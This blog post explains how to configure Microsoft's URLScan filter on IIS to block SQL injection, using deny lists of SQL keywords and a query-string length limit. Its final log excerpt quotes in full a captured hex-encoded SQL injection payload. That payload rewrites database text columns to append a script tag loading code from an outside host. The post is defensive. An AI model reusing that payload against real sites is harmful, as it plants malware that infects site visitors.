Bye Bye SQL Injections

With SQL Injections becoming more prevalent in the last few years we need to find better ways of deafening ourselves against these attacks, it seems that only the other week there was a new injection that has infected thousands of SQL servers [READ MORE HERE]

So here is a method that we can say bye bye to SQL Injection.

Well not completely, but maybe a large percentage of them how you ask… well simple code better… no no really I don’t claim to be a Developer / coder by any means and I would hate to think how hard it would be to cover every hole in a web application that was reasonably sized, in fact it might be near impossible?

Anyway back to the topic, I was alerted to an application that is called ‘URLScan’ (specifically 3.0 beta) it is a free Microsoft application, that acts as an ISAPI filter for II5.1, IIS6 and IIS7, after reading a bit about it my eyes were starting open wider and wider, the things that you can do with this tiny filter are simply amazing. It is nothing but a simple filter process where you can allow or deny access to file extensions, limit accepted URL length, Allow / deny Verbs, allow / deny access to URLstrings, the list goes on, now yes we can do some of these things in IIS, especially in IIS7 as it has brought a few of these functions to the table by default, but the ease of configuration and the expandability of this just blows using IIS additional security functions out of the water.

here is a screenshot of the default .ini file as you can see some of the many nifty features in the standard ini file. Some you will see that you can already control them in IIS.

image

So why would you use this over IIS for example in terms of the obvious what pages are accepted and pages are declined, well simple the logging is much easier read to the human eye, you can easily skim past it and find what you need quickly, IIS if you are logging everything (which if you run stats that collect IIS log files you will have this on) then the log files become quickly hard to read at first glance

here is a snippet of the log file output:

[08-13-2008 - 01:13:06] ----- UrlScan v3.0 Beta Config Initialization ----
[08-13-2008 - 01:13:06] The following verbs will be allowed: GET, HEAD, POST
[08-13-2008 - 01:13:06] The following extensions will not be allowed: .exe, .bat, .cmd, .com, .htw, .ida, .idq, .htr, .idc, .shtm, .shtml, .stm, .printer, .ini, .log, .pol, .dat, .config
[08-13-2008 - 01:13:06] The following URL sequences will be denied: .., ./, \, :, %%, &
[08-13-2008 - 01:13:06] The following Query String sequences will be denied: %%3C, %%3E, sql injection], appliesto=.asp,.aspx, denydatasection=sql injection strings, scanurl=0, scanallraw=0, scanquerystring=1, scanheaders=
[08-13-2008 - 01:13:06] The following rules are active: 
[08-13-2008 - 01:30:37] Client at 66.249.67.77: URL contains sequence '\', which is disallowed. Request will be rejected.  Site Instance='701014', Raw URL='/images%%5Cbtn_add.gif'

As you can see it shows URL scan is starting with what is being denied or allowed, the last line shows an entry where an IP address was denied access to a sequence.

I mentioned expandability previously, there is just so much you could do with this as an example here is some expandability you could tack into the ScanURL to stop SQL injections, its as simple as copy and paste into your INI file that’s it….

 
[SQL Injection]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=
 
[SQL Injection Strings]
--
;%3b ; a semicolon
/*
@ ; also catches @@
char ; also catches nchar and varchar
alter
begin
cast
convert
create
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
insert
kill
open
select
sys ; also catches sysobjects and syscolumns
table
update
 
[SQL Injection Headers]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Headers Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=0
ScanHeaders=Cookie:
 
[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
cast
convert
create
declare
delete
drop
exec ; also catches execute
fetch
insert
kill
select

Obviously there are problems with this because chances are that your web app uses some of these within a query string to retrieve the data from the database, but its a great starting point I would suggest running it all on a dev server test, watch the log file and see what is being queried, if you know it is needed then simply comment out the item that was denied, this will then allow it, its a simple process of elimination.

The other thing I have found with a considerably amount of SQL injections are they are very long strings, I found a number of Injections and then found the word count on them all, it averaged around 1050 characters, so if you web app doesn’t have extremely long query strings why not reduce the number of allowed characters???
say for example:

MaxQueryString=800

if you do this I do suggest monitoring this to ensure your web app is not in fact generating massive strings.

Since applying URLScan I have tried sending through Injections attacks (harmless ones) and so far they have failed and been caught by URLScan here is a an attempt from a log file from a test injection:

08-13-2008 – 00:54:46] Client at 190.77.130.45: Query string length exceeded maximum allowed. Request will be rejected. Site Instance=’2041367400′, QueryString= ‘ArticleID=335&PrintFriendly=True;DECLARE%%20@S%%20VARCHAR(4000);SET%%20@S=CAST(0×4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E393868732E72752F6A732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%%20AS%%20VARCHAR(4000));EXEC(@S);–’, Raw URL=’/Default.aspx’

 

Download URLScan 3.0 Beta (for x86 machines) here
Download URLScan 3.0 Beta (for x64 Machines) here


One Response to “Bye Bye SQL Injections”

Leave a Reply